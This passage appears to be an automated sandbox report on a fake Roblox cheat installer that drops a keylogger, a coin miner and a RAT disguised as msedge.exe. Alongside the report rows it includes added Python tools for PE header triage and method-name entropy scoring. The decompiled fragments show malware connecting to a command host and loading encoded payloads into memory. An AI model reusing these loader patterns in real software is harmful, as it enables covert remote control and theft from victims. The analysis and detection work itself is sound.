Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: ndfapi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: wdi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: duser.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: atlthunk.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: ndfapi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: wdi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: ndfapi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: wdi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: ieframe.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: version.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\roblox cheat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Automated click: OK
Source: C:\Windows\System32\cmd.exe | Automated click: OK
Source: C:\Windows\System32\cmd.exe | Automated click: OK
Source: C:\Windows\System32\cmd.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\roblox cheat.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: roblox cheat.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: roblox cheat.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: roblox cheat.exe | Static file information: File size 6410752 > 1048576
Source: roblox cheat.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x60fc00
Source: roblox cheat.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: roblox cheat.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb | source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
Source: Binary string: \rat\BitJoiner\payload\obj\Debug\payload.pdb | source: roblox cheat.exe
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb | source: roblox cheat.exe, cheatinstaler cheatinstalerF6R54T.exe.0.dr
Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM | source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM | source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM | source: robloxPX1instaler.exe, 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmp, robloxPX1instaler.exe, 00000002.00000000.1344820205.0000000000D68000.00000002.00000001.01000000.00000006.sdmp

            Data Obfuscation

Source: BitCoin_miner.exe.3.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: BitCoin_miner.exe.3.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{w3NlLrUpwn05JMopXTd8mSE7UP5bcp._9YAUzJ19chMfqFNJ6TCoEOI8QxrQHh,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.YxYN6QWQIWu5XVAci3urjI00UEnFJ7,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.CCtpPZimJrMU8onPEHRRYLPAiv05nO,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.MfOa5980QCPNnU9x3V9dVBMB71uRJj,dtVFTVK0Ux3SN1R.iCtkLrztKkZDBFY()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{N3zhZ0gcLgaQW9k[2],dtVFTVK0Ux3SN1R.By4JChD42wKAESJEe0khbaDthCWknJS4g49dw5i7eJRFccFB(Convert.FromBase64String(N3zhZ0gcLgaQW9k[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe.3.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe.3.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: BitCoin_miner.exe.3.dr, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: BitCoin_miner.exe.3.dr, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: BitCoin_miner.exe.3.dr, Messages.cs | .Net Code: Memory
Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs | .Net Code: LT2zntgXTGjsdzj2afFrTKkcoonKiN System.AppDomain.Load(byte[])
Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs | .Net Code: PBtLR1iSSO49jTq System.AppDomain.Load(byte[])
Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs | .Net Code: PBtLR1iSSO49jTq
Source: msedge.exe.3.dr, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: msedge.exe.3.dr, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: msedge.exe.3.dr, Messages.cs | .Net Code: Memory
Source: robloxPX1instaler.exe.0.dr | Static PE information: TimeDateStamp 0xADBEC9FB [Mon May 15 23:38:35 2062 UTC], a compile timestamp that lies in the future
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_6945218
Source: cheatinstaler cheatinstalerF6R54T.exe.0.dr | Static PE information: section name: .didat
Source: cheatinstaler cheatinstalerF6R54T.exe.0.dr | Static PE information: section name: _RDATA
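The static-PE rows above (the TimeDateStamp, the DllCharacteristics flags, the section names, the IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR directory that marks a .NET assembly, and the PDB paths listed under "Binary string") are all read straight from the PE header and its CodeView debug record. The Python below is an added example, not code from the Joe Sandbox report or its engine: it parses those fields from raw bytes, recovers PDB paths from RSDS records, and raises the same kind of findings against a constructed PE32+ header that carries the report's own values (timestamp 0xADBEC9FB, sections .text and .didat, the five DllCharacteristics flags, the BitJoiner PDB path). The COMMON_SECTIONS baseline and the wording of the findings are assumptions. Two caveats worth keeping in mind when reading such rows: .didat is the delay-import data section that ordinary MSVC builds emit, so an unusual section name on its own is weak evidence, and linkers run in reproducible-build mode (link.exe /Brepro) store a hash instead of a time in TimeDateStamp, which also produces impossible dates.

```python
import struct
from datetime import datetime, timedelta, timezone

# IMAGE_DLLCHARACTERISTICS_* bits from winnt.h, limited to the flags the report names.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}
IMAGE_DIRECTORY_ENTRY_DEBUG = 6
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14
# Assumed baseline of section names a stock MSVC or .NET build emits; others get listed.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc", ".idata", ".tls"}
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def parse_pe(data: bytes) -> dict:
    """Pull the header facts a 'Static PE information' block is built from."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    pe32plus = struct.unpack_from("<H", data, opt)[0] == 0x20B
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]  # same offset in PE32 and PE32+
    ndirs_off = opt + (108 if pe32plus else 92)
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    dirs = [struct.unpack_from("<II", data, ndirs_off + 4 + i * 8) for i in range(ndirs)]
    sect_table = opt + opt_size
    sections = [
        data[sect_table + i * 40:sect_table + i * 40 + 8].rstrip(b"\0").decode("ascii", "replace")
        for i in range(nsections)
    ]
    return {
        "timestamp": EPOCH + timedelta(seconds=stamp),
        "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dllchars & bit],
        "sections": sections,
        "has_debug_dir": len(dirs) > IMAGE_DIRECTORY_ENTRY_DEBUG
        and dirs[IMAGE_DIRECTORY_ENTRY_DEBUG][0] != 0,
        "has_clr": len(dirs) > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        and dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR][0] != 0,
    }


def pdb_paths(data: bytes) -> list:
    """Recover PDB paths from CodeView RSDS records: 'RSDS' + GUID(16) + age(4) + NUL-terminated path."""
    paths, pos = [], data.find(b"RSDS")
    while pos != -1:
        start = pos + 24
        end = data.find(b"\0", start)
        if end > start:
            paths.append(data[start:end].decode("latin-1"))
        pos = data.find(b"RSDS", pos + 4)
    return paths


def triage(data: bytes, now: datetime = None) -> dict:
    """Combine the parsed facts into findings of the kind a sandbox report lists."""
    info = parse_pe(data)
    info["pdb_paths"] = pdb_paths(data)
    now = now or datetime.now(timezone.utc)
    findings = []
    if info["timestamp"] > now:
        findings.append("timestamp in the future: " + info["timestamp"].isoformat())
    if info["has_clr"]:
        findings.append(".NET assembly (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR present)")
    unusual = [s for s in info["sections"] if s not in COMMON_SECTIONS]
    if unusual:
        findings.append("uncommon section names (weak signal): " + ", ".join(unusual))
    for path in info["pdb_paths"]:
        findings.append("pdb path: " + path)
    info["findings"] = findings
    return info


def build_sample_pe() -> bytes:
    """Constructed, non-executable PE32+ header that mirrors the report's values."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)           # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 2, 0xADBEC9FB, 0, 0, 240, 0x0022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                        # PE32+ magic
    struct.pack_into("<H", opt, 70, 0x8560)                      # the five flags above
    struct.pack_into("<I", opt, 108, 16)                         # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 14 * 8, 0x2008, 0x48)    # CLR header directory
    sections = b"".join(name.ljust(8, b"\0") + b"\0" * 32 for name in (b".text", b".didat"))
    rsds = (b"RSDS" + b"\x11" * 16 + struct.pack("<I", 1)
            + b"\\rat\\BitJoiner\\payload\\obj\\Debug\\payload.pdb\0")
    return dos + coff + bytes(opt) + sections + rsds


if __name__ == "__main__":
    result = triage(build_sample_pe())
    for key in ("timestamp", "dll_characteristics", "sections", "has_clr", "pdb_paths"):
        print("%-20s %s" % (key, result[key]))
    for finding in result["findings"]:
        print("finding:", finding)
```

Running the script against a real sample only needs `triage(open(path, "rb").read())`; the RSDS scan deliberately works on the raw file rather than through the debug directory so that it also surfaces PDB paths embedded in an SFX stub's payload, which is how three different PDB paths end up attributed to one file in the rows above.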
Source: C:\Users\user\Desktop\roblox cheat.exe | Code function: 0_2_01A5B6FF push edi; retn 0000h | 0_2_01A5B701
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Code function: 2_2_00D13175 push ecx; ret | 2_2_00D13188
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF754585166 push rsi; retf | 3_2_00007FF754585167
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF754585156 push rsi; retf | 3_2_00007FF754585157
Source: Keyloger.exe.3.dr, albqjOvwCQYLvRXxiGyhIpdY44vi5RLlo7VzM72FUP7qbNEq.cs | High entropy of concatenated method names: '_4MOkoXT607b9ZVv18hCOaQeksKQK1QY2Z59Hgn3vnGNBTDWY', 'aoVp1bvo8BQemLHmXPz6S0y0KAL2MZMS1pG20J1rmkO1yH36', 'yAFN5ozhCBuI45z4NTpIpiKfB19pUh9mAx6dQVO83WEQzG9S', '_1ORCLm148GvAasbvzvKe0j3op', 'xz4IVJsbdqQjT3fvrAzMqnpUJ', 'd5IEku84RPpe3jqqxUoOxlid9', 'baJVbebdBRSG0vXeqpQbaFGhF', 'PdROi8GC1qEzGAZ3jL0JM4kS1', '_4vWYxVH7giIuQNZUquEn1HcOH', 'iweLYuR0sjls7DY5DlgNakVEM'
Source: Keyloger.exe.3.dr, qPFRCBxxevtOrm6kkA6S3T0BVLfQqKPGErYWluL1k515NkyAjTBIKTN89KogayXJPuAweWS9osecqggfc7KqoqU1.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'OvBZh7NuYxNyoawDWVgb1bvQvny4ey9hxzXnZmUKYwMyHV3G', 'D1pK9yah6bW1RSKhi0bojd7k0gErawVt3UAqXVftOOGZ8Ek7', 'Amz2GUO9F3xqCrSqrojRM1z27y3P33TQxbcBuP2jeOuVoQ0I', 'XrVGbup25w9XJj82jHd5OO6JqCynsc4QvmRbz66DPHV276dk'
Source: Keyloger.exe.3.dr, tMXwX3tWlMuOZgJ.cs | High entropy of concatenated method names: 'LjeIsJHhRum59xL', '_6RsfQAJJYyt0J9HkPqIBAQeU380h3KOSQt3dHGv6rcNETpFQfgCb6boQcTnPkAwvsrPG8NTTAwKpmugXZhP', 'zaWTERDp5aT0SDSKgqc0pwq0a7ceYdFVq33bH5rm90KOgrgYcf23ikS2yDHBmgzl4t2KKfhUgFaKblNJ5k3', 'sWVdXUK0j8UTqkeKJ34zN69ydPubFvVaflAAl1XEpkV2r1QsYGAgJphVMO9CuJcZXSLKFk9ZU4EZ9kNpbPz', 'lFKVqnfF4sk3NIn44QcIBHZEg'
Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.cs | High entropy of concatenated method names: '_0c5jTYhRyonOUDziLx9bjo6xsSexAe', '_25wKNHm120NsmF8qQvTNtHz3RfwaXK', 'viLdoQDOYFFpv6KJ7CRK3qfhhqjyZ8', 'oyu0xUeMkLUDSGAbVhHha949466V1K', 'Vl9igX7Uc5X0UR61FqWGnXY9OhKp3l', '_5AqL7zP7f68dYFzd47NqgQFLffkmOs', 'HrBKo0STAWa5C612O2nnGfOgnFiJTT', 'EZ9n76FqTYmhSSOefwFVuL5ThwtwlO', 'E14zUxLx5YeoVLmDYLzZ6cZw9IN0jq', 'zBGEheUMvhUAXOJ5xyiI8x2n5H3mDM'
Source: Keyloger.exe.3.dr, dtVFTVK0Ux3SN1R.cs | High entropy of concatenated method names: '_7YMtWoQN5HfGCSK', 'OkqS6ol8M17XMmP', 'uNW6GrfQGz1M2XM', 'Ii6cHrN7BYLDzEF', '_5aJsNyLDXOhokOb', '_9vn0AlUd8GUTBri', 'JvICn3rRI6iioCk', 'UWKlns5zDZ2WYha', '_7hsyClPI7F56lLF', 'oG7pcy3sU6P1wO9'
Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs | High entropy of concatenated method names: 'yz3ulHWN9n14oJZA9i5vmrxphpzaCp', 'LT2zntgXTGjsdzj2afFrTKkcoonKiN', 'RVfS3lUZ13RpRJx', '_36yQU5duIkCbW2T', 'xm86z0xRhaJxcNt', 'meydQmflaU7lI44', 'ulkLjOcP0yxW7UI', 'b6Kn4aSdInWG889', 'buvrIstkF8NGBRb', 'YEEc5g9ZTXWiw5i'
Source: Keyloger.exe.3.dr, 3hMB2la9XyjPtIBDiudYxRNIVlJFvm.cs | High entropy of concatenated method names: 'LfvVtvqV46cUkGAPMYI4VquR3SMv2D', 'vIoAF5cBXshvrNilb2DuPcULPAXNvn', 'kA8SgQYodhg33g9XqJGDIcdyDuU2eq', 'lQv3wZATHx75FgR1TEYl60evq1ah4O', 'PSUdXouR3XnWp7uzoDx9bmHtKpUEQn', 'hianEuAU3qLDiz0mgrS8dJ9EtIpg4FKSm', '_1Uzw1Jv75GWN68eZuqAFXHg859jSuA3VZ', 'Nm7Liat39gbXWFp1qqe6HHX35VDFiL7Da', 'i9EMzetgnoZiy3VF71knEPeukHZBiLL2k', 'jUtPhbUZdmJ9iBO2Yt3x7WmdMEVCHS7NK'
Source: Keyloger.exe.3.dr, WPBnCaT3d8cYQmg.cs | High entropy of concatenated method names: 'XqbpRmwJ4LtIvAR', 'P0jTCqOar3cv9vv', 'cQ4yWoyO6QI0787', '_9bNc4FZpvPn2d8N', 'tSubarXMNHmpIgk', '_0QpL3D9FsZYYURB', 'e12J0P1bomhydt6', 'a8HR9xsSDvlWrSZ', 'fkNSnoNe84RdGzT', 'De6iaF9HVBWEBkc'
Source: Keyloger.exe.3.dr, R0AwzNAU4OLQBy5.cs | High entropy of concatenated method names: '_8DVPMgIt5LmyReW', 'BZVAT9UWtB9Y41EBslDUkcaMcEz93wnp4TwFdsJAwNlh5HH3J22aeHQ4iYM26w4Bz', 'xRvMGytdQ2t0vvaBZmUAw8zGZw6lREIjCy8Hi0yW4uNgQnuaYaSOw4QBYq6OZfOm6', 'YZHXocKFTuIAqCnIKSsaOe8Bu7xKEX61eFFh0gCYv1doZqxiACFmQx8wx0U5Tmaxw', 'KseJ4CZxDxgasaIvvghOQYUtjhm1qNwU5KPV4WJnB97il4HcI4MBrgr30GaNE3nxx'
Source: Keyloger.exe.3.dr, tUULgqwzOy3tsY4.cs | High entropy of concatenated method names: 'XyjKcb0SD0Rnsly', 'onnajoto1IWR83c', '_4JRwDCvuPsxAFxT', 'TUfvtJiSrFTFqfO', 'hKn7O9jilUma2Zw0Est6bw1gkRujD0aPP8Houzr8kpBXX8Is19SryYZ18XrIvaHfPSx1xl3SMjVYx3EGcSp', 'h4RQD1MY3oKURj7ED4KIYRKHKVX617yrfjpvxqbClLGSMVnQNaxibqcg3p41qk3VHfmtekuu5XcduvTUIrL', '_0W2Q7XRDNANGyYK7eYQ1CBoe0T8xbd2SwsQUxdTTxt63ViT6oSnfQrQtDAtoh5P5JHq9VyPg2PLPvvUYpYy', 'qDu4N9S6yNJjuF2IyC1Dipv55nveXbngGs3oU5y97y0gm1zMrkqsSs3csriArDoT7m4uVmnmZE7RcOPNSr2', 'XAGEDgUZ2PI2TXU92O0Frre9DggfBwEZw8SBXJzLTqRAXOPeOXIvKsXXvekl5fCqtfggq9yas1x0W6UAKyW', '_2yOrKM1R5TZHaIoRlmRHTfmfg0sAWQFAnGRUnIyLkL8leSVsnLbKF2mAFPNh8FY82TUpGr5X3XvinrE8GQD'
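Each "High entropy of concatenated method names" row scores one class: the names of its methods are joined into a single string and the Shannon entropy of that string's character distribution is compared with a cut-off. The Python below is an added example, not code from Joe Sandbox, that reproduces the measurement on the dtVFTVK0Ux3SN1R.cs names quoted above and on a constructed list of ordinary .NET method names, and adds one further check an analyst looks for in the same rows: identifiers that begin with an underscore followed by a digit (`_7YMt...`, `_4MOko...`), the fix-up a renaming obfuscator applies because a C# identifier may not start with a digit. The 4.8 bits-per-character threshold is an assumption; the report does not state the cut-off it uses.

```python
import math
import re
from collections import Counter

# Method names quoted in the report's row for Keyloger.exe, dtVFTVK0Ux3SN1R.cs.
OBFUSCATED = ["_7YMtWoQN5HfGCSK", "OkqS6ol8M17XMmP", "uNW6GrfQGz1M2XM", "Ii6cHrN7BYLDzEF",
              "_5aJsNyLDXOhokOb", "_9vn0AlUd8GUTBri", "JvICn3rRI6iioCk", "UWKlns5zDZ2WYha",
              "_7hsyClPI7F56lLF", "oG7pcy3sU6P1wO9"]
# Constructed sample: what a hand-written class of similar size tends to expose.
ORDINARY = ["Equals", "GetHashCode", "GetType", "ToString", "Dispose", "Initialize",
            "LoadSettings", "SaveSettings", "Connect", "SendMessage"]
# Assumed cut-off in bits per character; the report does not publish the one it applies.
ENTROPY_THRESHOLD = 4.8
# C# identifiers may not start with a digit, so renamers emit "_7..." where they wanted "7...".
DIGIT_FIXUP = re.compile(r"^_\d")


def shannon_entropy(text: str) -> float:
    """Bits per character of the empirical character distribution of text."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def class_entropy(method_names) -> float:
    """Entropy of all method names of one class joined into one string, so that
    a class with short names still yields a usable sample size."""
    return shannon_entropy("".join(method_names))


def leading_digit_fixups(method_names) -> int:
    """Count identifiers of the form _<digit>..., a tell of machine-generated names."""
    return sum(1 for name in method_names if DIGIT_FIXUP.match(name))


def score_classes(classes: dict, threshold: float = ENTROPY_THRESHOLD) -> list:
    """One row per class, shaped like the report's rows: (class, entropy, fixups, flagged)."""
    rows = []
    for class_name, names in classes.items():
        h = class_entropy(names)
        rows.append((class_name, round(h, 2), leading_digit_fixups(names), h >= threshold))
    return rows


if __name__ == "__main__":
    sample = {"dtVFTVK0Ux3SN1R.cs": OBFUSCATED, "constructed_ordinary": ORDINARY}
    for row in score_classes(sample):
        print("%-22s entropy=%.2f fixups=%d flagged=%s" % row)
```

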